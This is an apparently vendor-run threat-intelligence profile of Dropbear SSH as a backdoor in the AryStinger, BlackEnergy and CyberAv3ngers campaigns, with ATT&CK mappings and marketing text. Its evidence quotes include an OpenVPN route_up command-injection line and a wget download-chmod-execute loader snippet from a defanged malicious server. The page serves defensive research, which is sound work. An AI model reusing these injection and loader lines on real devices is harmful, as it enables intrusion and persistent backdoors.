Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
Back to malware
MalwareUsed by 1 actor

Dropbear

Dropbear is a lightweight SSH server and remote access utility that appears in the provided content as a backdoor component deployed on compromised devices and endpoints. In the AryStinger botnet campaign, the malware downloads dropbear and dropbearkey into /tmp/bin, starts the Dropbear SSH service, and modifies iptables to permit access, establishing persistent remote login access for the attacker. QiAnXin reported AryStinger can use Dropbear or gs-netcat to maintain long-term remote management channels on infected RTL819X-based routers and NAS devices; one observed RTL819X watchdog component started Dropbear on port 2332. The content also states that CERT-UA and ESET observed BlackEnergy using its modular plugin architecture to download and keep running a variant of the Dropbear SSH backdoor during the Ukraine attacks, alongside the KillDisk destructive plugin. Separately, U.S. government advisories cited Iran-affiliated actors deploying Dropbear SSH on victim operational technology endpoints after initial access to internet-exposed PLC environments, using port 22 for remote access to extract project files and manipulate HMI and SCADA display data. High-confidence behaviors directly mentioned in the content include persistent SSH-based backdoor access, remote login enablement, and use on infected routers, NAS devices, Windows victim environments associated with BlackEnergy, and OT endpoints in government, water, wastewater, and energy sectors.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
CyberAv3ngers

Additionally, the actors deployed Dropbear Secure Shell (SSH) software on victim endpoints to enable them to gain remote access through port 22 [T1219].

via ic3 alertsic3.gov
MITRE ATT&CK

Techniques & procedures

7 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1078Valid AccountsEvidence1

...start up a dropbear server that allows for remote logins using the same credentials that are used for the web GUI, resulting in a remote shell...

T1133External Remote ServicesEvidence4

Both versions establish persistent backdoors on infected devices, either through a lightweight SSH server called dropbear or through gs-netcat, giving attackers long-term remote access.

Execution

1 technique
T1059.004Unix ShellEvidence2

An os command injection vulnerability exists in the Openvpn configuration restore route_up functionality... A specially crafted configuration value can lead to arbitrary command execution... if we include in our restored configuration the following xml line: <route_up>"/usr/sbin/dropbear -g -w -C -B -L -p 22"</route_up> This command will be put into the configuration of the openvpn server and run immediately after a vpn connection is established.

Persistence

3 techniques
T1078Valid AccountsEvidence1

...start up a dropbear server that allows for remote logins using the same credentials that are used for the web GUI, resulting in a remote shell...

T1133External Remote ServicesEvidence4

Both versions establish persistent backdoors on infected devices, either through a lightweight SSH server called dropbear or through gs-netcat, giving attackers long-term remote access.

T1556Modify Authentication ProcessEvidence2

...start up a dropbear server that allows for remote logins using the same credentials that are used for the web GUI, resulting in a remote shell...

Privilege Escalation

1 technique
T1078Valid AccountsEvidence1

...start up a dropbear server that allows for remote logins using the same credentials that are used for the web GUI, resulting in a remote shell...

Stealth

1 technique
T1078Valid AccountsEvidence1

...start up a dropbear server that allows for remote logins using the same credentials that are used for the web GUI, resulting in a remote shell...

Defense Impairment

1 technique
T1556Modify Authentication ProcessEvidence2

...start up a dropbear server that allows for remote logins using the same credentials that are used for the web GUI, resulting in a remote shell...

Credential Access

1 technique
T1556Modify Authentication ProcessEvidence2

...start up a dropbear server that allows for remote logins using the same credentials that are used for the web GUI, resulting in a remote shell...

Lateral Movement

1 technique
T1021.004SSHEvidence2

The Bot downloads dropbear... starts the dropbear SSH service on a specific local port, and configures iptables to allow traffic on that port, thereby establishing a persistent remote login backdoor for the attacker.

Command and Control

2 techniques
T1071Application Layer ProtocolEvidence1

Upon obtaining initial access, the threat actors established command-and-control by deploying Dropbear... Public-facing domains and Telegram channels serve as the primary dissemination and amplification hub, with the messaging platform also playing a huge role in command-and-control (C2) operations by allowing the malware to communicate with threat actor-controlled bots...

T1105Ingress Tool TransferEvidence1

Its function is to first obtain the latest version number from the download server hgodpcx[.]ajb8.com, then download and execute the corresponding AryStinger sample... wget -q -O "${BIN_PATH}" "${SRC_URL}" ... chmod +x "${BIN_PATH}" ... "${BIN_PATH}" -b "${CTX}"

ACTIVITY FEED

Recent activity

6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

6 SOURCESView more in app
cyber security newsNews
Jun 22, 2026
AryStinger Botnet Hijacks 4,300+ Routers to Build Global Attack Proxy Network

Dropbear is referenced as a lightweight SSH server used by AryStinger to establish persistent backdoor access on infected devices.

Read more
qianxin xlab blogNews
Jun 17, 2026
More Than 4,000 Legacy Routers Compromised by AryStinger, Turned into Global Attack Proxies for Hackers

Dropbear is used by AryStinger on compromised routers to establish persistent SSH-based remote access for attackers.

Read more
the hacker newsNews
Apr 8, 2026
Iran-Linked Hackers Disrupt U.S. Critical Infrastructure by Targeting Internet-Exposed PLCs

SSH software deployed on victim endpoints to establish command-and-control and remote access over port 22 in OT intrusions.

Read more
web archiveNews
Mar 23, 2016
BlackEnergy APT Malware | RSA Link

SSH backdoor variant deployed as a plugin alongside BlackEnergy in the Ukraine attacks.

Read more
+1 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping7

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.